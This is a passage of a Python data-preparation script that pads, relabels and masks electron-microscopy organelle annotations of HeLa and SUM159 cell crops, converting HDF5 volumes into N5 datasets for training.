- np.array(labels.attrs["resolution"]) / 2.0
)
+ np.array(raw.attrs["resolution"] / 2.0)
)
/ np.array(labels.attrs["resolution"])
).astype(np.int)
padding_after = (
np.array(target["volumes/raw"].shape) - padding_before - np.array(labels.shape)
).astype(np.int)
padding = tuple((b, a) for b, a in zip(padding_before, padding_after))
bg_label = 18446744073709551613
logging.info(
"padding LABELS with {0:} to match shape of upscaled RAW, padding value {1:} and relabeling "
"using mapping {2:} to {3:}".format(
padding, bg_label, range(len(mapping)), mapping
)
)
# labels_padded = np.pad(labels, padding, 'constant', constant_values=bg_label)
# numpy.pad has a bug when handling uint64, it is fixed in the current master so should be good with the next
# numpy release (currently 1.14.3)
labels_padded = np.ones((rs * 2 for rs in raw.shape), dtype=np.uint64) * bg_label
labels_padded[
padding[0][0] : -padding[0][1],
padding[1][0] : -padding[1][1],
padding[2][0] : -padding[2][1],
] = mapping[np.array(labels)]
cont_relabeled = np.unique(labels_padded)
hist_relabeled = np.histogram(
labels_padded, bins=list(cont_relabeled) + [cont_relabeled[-1] + 0.1]
)
logging.info(
"padded LABELS contains ids {0:} in freq {1:}".format(
cont_relabeled, hist_relabeled[0]
)
)
assert raw_up.shape == labels_padded.shape
if ribos:
ribosomes_padded = np.ones(labels_padded.shape, dtype=np.uint64) * bg_label
ribosomes_padded[
padding[0][0] : -padding[0][1],
padding[1][0] : -padding[1][1],
padding[2][0] : -padding[2][1],
] = np.array(ribosomes)
ribosomes_mask_padded = np.zeros(labels_padded.shape, dtype=np.uint64)
ribosomes_mask_padded[
padding[0][0] : -padding[0][1],
padding[1][0] : -padding[1][1],
padding[2][0] : -padding[2][1],
] = np.ones(ribosomes.shape)
cont_ribo_relabeled = np.unique(ribosomes_padded)
hist_ribo_relabeled = np.histogram(
ribosomes_padded,
bins=list(cont_ribo_relabeled) + [cont_ribo_relabeled[-1] + 0.1],
)
else:
ribosomes_mask_padded = np.zeros(labels_padded.shape, dtype=np.uint64)
if "labels" not in target["volumes"]:
target["volumes"].create_group("labels")
add_ds(
target,
"volumes/labels/all",
labels_padded,
labels.chunks,
list(labels.attrs["resolution"]),
[0.0, 0.0, 0.0],
orig_ids=list(hist[1]),
orig_counts=list(hist[0]),
relabeled_ids=list(hist_relabeled[1]),
relabeled_counts=list(hist_relabeled[0]),
mapping=list(mapping),
)
add_ds(
target,
"volumes/mask",
(labels_padded != bg_label).astype(labels.dtype),
labels.chunks,
list(labels.attrs["resolution"]),
[0.0, 0.0, 0.0],
)
del labels_padded
if ribos:
add_ds(
target,
"volumes/labels/ribosomes",
ribosomes_padded,
ribosomes.chunks,
list(ribosomes.attrs["resolution"]),
[0.0, 0.0, 0.0],
orig_ids=list(hist_ribo[1]),
orig_counts=list(hist_ribo[0]),
relabeled_ids=list(hist_ribo_relabeled[1]),
relabeled_counts=list(hist_relabeled[0]),
)
add_ds(
target,
"volumes/ribosomes_mask",
ribosomes_mask_padded,
labels.chunks,
list(labels.attrs["resolution"]),
[0.0, 0.0, 0.0],
)
# add_subset_label_ds(target, labels_padded, 'volumes/labels/ECS', (6, 7),
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/cell', (1, 2, 3, 4, 5, 8, 9, 10, 11, 12, 13, 14),
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/plasma_membrane', 5,
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/ERES', (12, 13),
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/ERES_membrane', 12,
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/mvb', (3, 9),
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/mvb_membrane', 3,
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/er', (4, 8),
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/er_membrane', 4,
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/mito', (1, 2),
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/mito_membrane', 2,
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/vesicles', 10,
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/microtubules', 11,
# labels.chunks, list(labels.attrs['resolution']))
orig.close()
def main_multiscale(
orig,
target,
labelnames,
mapping,
min_ad,
max_ad,
src_label_name="volumes/labels/gt",
specified_masks=None,
separate_datasets=None,
):
if specified_masks is None:
specified_masks = dict()
if separate_datasets is None:
separate_datasets = dict()
if "volumes" not in target.keys():
target.create_group("volumes")
if "labels" not in target["volumes"]:
target["volumes"].create_group("labels")
if "masks" not in target["volumes"]:
target["volumes"].create_group("masks")
# raw dataset
raw = orig["volumes/raw"]
logging.info(
"RAW dataset {0:} has resolution {1:} and offset {2:}".format(
raw.shape, raw.attrs["resolution"], raw.attrs["offset"]
)
)
add_ds(
target,
"volumes/raw",
contrast_adaptation(np.array(raw), min_ad, max_ad),
raw.chunks,
list(raw.attrs["resolution"]),
[0.0, 0.0, 0.0],
)
# generic labels
labels = orig[src_label_name]
logging.info(
"LABELS dataset {0:} has resolution {1:} and offset {2:}".format(
labels.shape, labels.attrs["resolution"], labels.attrs["offset"]
)
)
cont = np.unique(labels)
hist = np.histogram(labels, bins=list(cont) + [cont[-1] + 0.1])
logging.info("LABELS contains ids {0:} in freq {1:}".format(cont, hist[0]))
# compute padding
padding_before = (
(
(
np.array(labels.attrs["offset"])
- np.array(labels.attrs["resolution"]) / 2.0
)
+ np.array(raw.attrs["resolution"] / 2.0)
)
/ np.array(labels.attrs["resolution"])
).astype(np.int)
padding_after = (
2 * np.array(raw.shape) - padding_before - np.array(labels.shape)
).astype(np.int)
padding = tuple((b, a) for b, a in zip(padding_before, padding_after))
bg_label = 18446744073709551613
logging.info(
"padding LABELS with {0:} to match shape of upscaled RAW, padding value {1:} and relabeling "
"using mapping {2:} to {3:}".format(
padding, bg_label, range(len(mapping)), mapping
)
)
# labels_padded = np.pad(labels, padding, 'constant', constant_values=bg_label)
# numpy.pad has a bug when handling uint64, it is fixed in the current master so should be good with the next
# numpy release (currently 1.14.3)
labels_padded = (
np.ones(tuple([rs * 2 for rs in raw.shape]), dtype=np.uint64) * bg_label
)
labels_padded[
padding[0][0] : -padding[0][1],
padding[1][0] : -padding[1][1],
padding[2][0] : -padding[2][1],
] = mapping[np.array(labels)]
cont_relabeled = np.unique(labels_padded)
hist_relabeled = np.histogram(
labels_padded, bins=list(cont_relabeled) + [cont_relabeled[-1] + 0.1]
)
logging.info(
"padded LABELS contains ids {0:} in freq {1:}".format(
cont_relabeled, hist_relabeled[0]
)
)
add_ds(
target,
"volumes/labels/all",
labels_padded,
labels.chunks,
list(labels.attrs["resolution"]),
[0.0, 0.0, 0.0],
orig_ids=list(hist[1]),
orig_counts=list(hist[0]),
relabeled_ids=list(hist_relabeled[1]),
relabeled_counts=list(hist_relabeled[0]),
mapping=list(mapping),
)
for l in labelnames:
if l in separate_datasets.keys():
label_orig = separate_datasets[l]
label_data = label_orig["volumes/labels/" + l]
logging.info(
"{0:} dataset {1:} has resolution {2:} and offset {3:}".format(
l.upper(),
label_data.shape,
label_data.attrs["resolution"],
label_data.attrs["offset"],
)
)
cont_label = np.unique(label_data)
hist_label = np.histogram(
label_data, bins=list(cont_label) + [cont_label[-1] + 0.1]
)
label_data_padded = np.ones(labels_padded.shape, dtype=np.uint64) * bg_label
label_data_padded[
padding[0][0] : -padding[0][1],
padding[1][0] : -padding[1][1],
padding[2][0] : -padding[2][1],
] = np.array(label_data)
cont_label_relabeled = np.unique(label_data_padded)
hist_label_relabeled = np.histogram(
label_data_padded,
bins=list(cont_label_relabeled) + [cont_label_relabeled][-1] + 0.1,
)
add_ds(
target,
"volumes/labels/" + l,
label_data_padded,
label_data.chunks,
list(label_data.attrs["resolution"]),
[0.0, 0.0, 0.0],
orig_ids=list(hist_label[1]),
orig_counts=list(hist_label[0]),
relabeled_ids=list(hist_label_relabeled[1]),
relabeled_counts=list(hist_label_relabeled[0]),
)
# masks
mask = ((labels_padded != bg_label)[::2, ::2, ::2]).astype(np.uint64)
add_ds(
target,
"volumes/masks/training",
mask,
labels.chunks,
list(raw.attrs["resolution"]),
[0.0, 0.0, 0.0],
)
for l in labelnames:
if l not in specified_masks.keys():
add_ds(
target,
"volumes/masks/" + l,
mask,
labels.chunks,
list(raw.attrs["resolution"]),
[0.0, 0.0, 0.0],
)
else:
if specified_masks[l] == 0:
label_mask = np.zeros(mask.shape, dtype=np.uint64)
elif specified_masks[l] == 1:
label_mask = mask
elif isinstance(specified_masks[l], str) or isinstance(
specified_masks[l], unicode
):
assert orig[specified_masks[l]].shape == mask.shape
label_mask = np.array(orig[specified_masks[l]]) * mask
else:
raise ValueError
add_ds(
target,
"volumes/masks/" + l,
label_mask,
labels.chunks,
list(raw.attrs["resolution"]),
[0.0, 0.0, 0.0],
)
orig.close()
def main_cell2_crop1():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/HeLa_Cell2_Crop1_Periphery"
"/Cell2_Crop1_1012x1012x612+6210-31+344.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop1_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
# mapping = np.array([0, 9, 8, 10, 4, 2, 1, 1, 5, 11, 12, 14, 6, 7, 3, 13])
mapping = np.array([0, 4, 3, 10, 16, 2, 1, 1, 17, 11, 8, 26, 18, 19, 29, 9])
ribos = False
main(orig, target, mapping, ribos)
def main_cell2_crop3():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/HeLa_Cell2_Crop3_Mitos"
"/Cell2_Crop3_912x912x762+7544-56+3743.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop3.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
mapping = np.array([0, 16, 10, 2, 3, 8, 26, 17, 4, 11, 9, 18, 29, 1, 5, 19, 12, 13])
ribos = False
main(orig, target, mapping, ribos)
def main_cell2_crop6():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/HeLa_Cell2_Crop6_Ribosome"
"/Cell2_Crop6_762x762x762+2764+144+2743_labels-only.h5",
"r",
)
ribo_orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop6_Ribosome"
"/Cell2_Crop6_762x762x762+2764+144+2743_ribosomes.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop6.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
mapping = np.array([0, 16, 17, 3, 4, 10, 11, 29, 18, 19, 26])
ribos = True
main(orig, target, mapping, ribos, ribo_orig=ribo_orig)
def main_cell2_crop7():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/HeLa_Cell2_Crop7_PM"
"/Cell2_Crop7_812x812x592+8024-16-256.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop7.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
mapping = np.array(range(972))
mapping[:11] = np.array([0, 2, 2, 1, 29, 29, 26, 8, 9, 3, 4])
mapping[971] = 2
ribos = True
srcds = "volumes/labels/merged_ids"
main(orig, target, mapping, ribos, src_label_name=srcds)
def main_cell2_crop8():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/HeLa_Cell2_Crop8_ERES001"
"/Cell2_Crop8_712x712x612+3129+24+993.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop8_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
# mapping = np.array([0, 4, 6, 7, 14, 3, 5, 12, 13, 10])
mapping = np.array([0, 16, 18, 19, 26, 29, 17, 8, 9, 10])
ribos = False
main(orig, target, mapping, ribos)
def main_cell2_crop9():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/HeLa_Cell2_Crop9_ERES002"
"/Cell2_Crop9_612x612x565+2644+164+1353.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop9_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
# mapping = np.array([0, 6, 8, 9, 3, 4, 5, 7, 10, 11, 14, 12, 13])
mapping = np.array([0, 18, 3, 4, 29, 16, 17, 19, 10, 11, 26, 8, 9])
ribos = False
main(orig, target, mapping, ribos)
def main_cell2_crop13():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/HeLa_Cell2_Crop13_ERES006"
"/Cell2_Crop13_672x672x622+4904+504+3676.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop13_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
mapping = np.array([0, 16, 18, 19, 10, 11, 29, 26, 20, 21, 24, 25, 17, 8, 9])
ribos = True
main(orig, target, mapping, ribos)
def main_cell2_crop14():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/HeLa_Cell2_Crop14_ERES007"
"/Cell2_Crop14_662x662x577+6074+119+4160.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop14_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
# mapping = np.array([0, 4, 7, 6, 14, 3, 5, 12, 13])
mapping = np.array([0, 16, 19, 18, 26, 29, 17, 8, 9])
ribos = False
main(orig, target, mapping, ribos)
def main_cell2_crop15():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/HeLa_Cell2_Crop15_ERES008"
"/Cell2_Crop15_662x662x576+5874+189+4154.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop15_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
# mapping = np.array([0, 4, 5, 6, 7, 3, 14])
mapping = np.array([0, 16, 17, 18, 19, 29, 26])
ribos = False
main(orig, target, mapping, ribos)
def main_cell2_crop18():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations//HeLa_Cell2_Crop18_MVB"
"/Cell2_Crop18_712x712x622+1654-56+3474.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop18_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
mapping = np.array([0, 26, 29, 16, 17, 10, 11])
ribos = False
main(orig, target, mapping, ribos)
def main_cell2_crop19():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/HeLa_Cell2_Crop19_BadLD"
"/Cell2_Crop19_662x662x567+6644+144+4679.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop19_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
mapping = np.array([0, 16, 17, 14, 15, 26, 8, 9, 29])
ribos = False
main(orig, target, mapping, ribos)
def main_cell2_crop20():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations//SUM159_Cell2_Crop20_LD001"
"/Cell2_Crop20_712x712x597+4449+489+5245.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop20_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
mapping = np.array([0, 3, 4, 14, 15, 16, 17, 10, 11, 29])
ribos = False
main(orig, target, mapping, ribos)
def main_cell2_crop21():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations//SUM159_Cell2_Crop21_LD002"
"/Cell2_Crop21_672x672x567+4304+374+5320.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop21_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
mapping = np.array([0, 3, 4, 16, 17, 14, 15, 29])
ribos = False
main(orig, target, mapping, ribos)
def main_cell2_crop22():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/SUM159_Cell2_Crop22_LD003"
"/Cell2_Crop22_682x682x612+3754+204+5124.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop22_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
mapping = np.array([0, 29, 16, 17, 14, 15, 10, 11, 26])
ribos = False
main(orig, target, mapping, ribos)
def main_multiscale_crop1(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop1_Periphery"
"/Cell2_Crop1_1510x1510x1170+5961-280+65.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop1.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 4, 3, 10, 16, 2, 1, 1, 17, 11, 8, 30, 18, 19, 35, 9])
# [0, mito lumen, mito membrane, MVB membrane, er membrane, plasma membrane, ECS, ECS, er lumen, MVB lumen,
# vesicle membrane, microtubules, ERES membrane, ERES lumen, cytosol, vesicle lumen]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop3(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop3_Mitos/Cell2_Crop3_1410x1410x1260"
"+7295-305"
"+3494.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop3.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 16, 10, 2, 3, 8, 30, 17, 4, 11, 9, 18, 35, 1, 5, 19, 12, 13])
# [0, er membrane, MVB membrane, plasma membrane, mito membrane, vesicle membrane, microtubules, er lumen,
# mito lumen, MVB lumen, vesicle lumen, ERES membrane, cytosol, ECS, mito DNA, ERES lumen, lysosome membrane,
# lysososme lumen]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop6(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop6_Ribosome"
"/Cell2_Crop6_1260x1260x1260+2515-105+2494.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop6.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([30, 16, 17, 3, 4, 10, 11, 35, 18, 19, 30])
# [0, er membrane, er lumen, mito membrane, mito lumen, MVB membrane, MVB lumen, cytosol, ERES membrane,
# ERES lumen, microtubules]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig,
target,
labels,
mapping,
min_ad,
max_ad,
specified_masks={"ribosomes": 1},
separate_datasets={"ribosomes": orig},
)
def main_multiscale_crop7(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop7_PM"
"/Cell2_Crop7_1310x1310x1170+7775-265-545.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop7.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 2, 2, 1, 35, 35, 30, 8, 9, 3, 4])
# [0, plasma membrane, plasma membrane, ECS, cytosol, cytosol, microtubules, vesicle membrane, vesicle lumen,
# mito membrane, mito lumen]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig,
target,
labels,
mapping,
min_ad,
max_ad,
specified_masks={"ribosomes": 1},
separate_datasets={"ribosomes": orig},
src_label_name="volumes/labels/merged_ids",
)
def main_multiscale_crop8(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop8_ERES001"
"/Cell2_Crop8_1210x1210x1170+2880-225+714.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop8.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 16, 18, 19, 30, 35, 17, 8, 9, 10])
# [0, er membrane, ERES membrane, ERES lumen, microtubules, cytosol, er lumen, vesicle membrane, vesicle lumen,
# MVB membrane]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop9(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop9_ERES002"
"/Cell2_Crop9_1170x1170x1171+2365-115+1050.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop9.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 18, 3, 4, 35, 16, 17, 19, 10, 11, 30, 8, 9])
# [0, ERES membrane, mito membrane, mito lumen, cytosol, er membrane, er lumen, ERES lumen, MVB membrane,
# MVB lumen, microtubules, vesicle membrane, vesicle lumen]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop13(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop13_ERES006"
"/Cell2_Crop13_1170x1170x1170+4655+255+3402.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop13.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 16, 18, 19, 10, 11, 35, 30, 20, 21, 36, 28, 17, 8, 9])
# [0, er membrane, ERES membrane, ERES lumen, MVB membrane, MVB lumen, cytosol, microtubules, nuclear envelope
# membrane, nuclear envelope lumen, chromatin, nucleoplasm, er lumen, vesicle membrane, vesicle lumen]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig,
target,
labels,
mapping,
min_ad,
max_ad,
specified_masks={
"ribosomes": 1,
"HChrom": 0,
"NHChrom": 0,
"EChrom": 0,
"NEChrom": 0,
},
separate_datasets={"ribosomes": orig},
)
def main_multiscale_crop14(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop14_ERES007"
"/Cell2_Crop14_1170x1170x1171+5820-135+3863.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop14.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 16, 19, 18, 30, 35, 17, 8, 9])
# [0, er membrane, ERES lumen, ERES membrane, microtubules, cytosol, er lumen, vesicle membrane, vesicle lumen]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop15(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop15_ERES008"
"/Cell2_Crop15_1170x1170x1170+5620-65+3857.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop15.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 16, 17, 18, 19, 35, 30])
# [0, er membrane, er lumen, ERES membrane, ERES lumen, cytosol, microtubules]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop18(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop18_MVB"
"/Cell2_Crop18_1210x1210x1170+1405-305+3200.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop18.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 30, 35, 16, 17, 10, 11, 8, 9])
# [0, microtubules, cytosol, er membrane, er lumen, MVB membrane, MVB lumen, vesicle membrane, vesicle lumen]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop19(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop19_BadLD"
"/Cell2_Crop19_1170x1170x1171+6390-110+4377.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop19.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 16, 17, 14, 15, 30, 8, 9, 35])
# [0, er membrane, er lumen, LD membrane, LD lumen, microtubules, vesicle membrane, vesicle lumen, cytosol]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop20(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/SUM159_Cell2_Crop20_LD001"
"/Cell2_Crop20_1210x1210x1171+4200+240+4958.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop20.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 3, 4, 14, 15, 16, 17, 10, 11, 35])
# [0, mito membrane, mito lumen, LD membrane, LD lumen, er membrane, er lumen, MVB membrane, MVB lumen, cytosol]
min_ad = 172.0
max_ad = 233.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop21(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/SUM159_Cell2_Crop21_LD002"
"/Cell2_Crop21_1170x1170x1171+4055+125+5018.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop21.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 3, 4, 16, 17, 14, 15, 35])
# [0, mito membrane, mito lumen, er membrane, er lumen, LD membrane LD lumen, cytosol]
min_ad = 172.0
max_ad = 233.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop22(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/SUM159_Cell2_Crop22_LD003"
"/Cell2_Crop22_1180x1180x1170+3505-45+4845.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop22.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 35, 16, 17, 14, 15, 10, 11, 30])
# [0, cytosol, er membrane, er lumen, LD membrane, LD lumen, MVB membrane, MVB lumen, microtubules]
min_ad = 172.0
max_ad = 233.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop4(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop4_Centrosome"
"/Cell2_Crop4_1310x1310x1248+5595-305+2232.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop4.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array(
[0, 20, 24, 10, 30, 28, 22, 23, 6, 35, 16, 7, 13, 11, 17, 21, 33, 32, 8, 9, 12]
)
# [0, NE membrane, HChrom , MVB membrane, microtubules, nucleoplasm, nuclear pore outside, nuclear pore inside,
# golgi membrane, cytosol, er membrane, golgi lumen, lysosome lumen, MVB lumen, er lumen, NE lumen,
# subidstal appendages, distal appendages, vesicle membrane, vesicle lumen, lysosome membrane]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig,
target,
labels,
mapping,
min_ad,
max_ad,
specified_masks={
"ribosomes": 0,
"NHChrom": 1,
"EChrom": 0,
"NEChrom": 1,
"chromatin": 0,
"microtubules": "volumes/masks/microtubules",
},
)
def run_main_multiscale():
logging.basicConfig(level=logging.INFO)
labels = [
"ecs",
"plasma_membrane",
"mito_membrane",
"mito",
"mito_DNA",
"golgi_membrane",
"golgi",
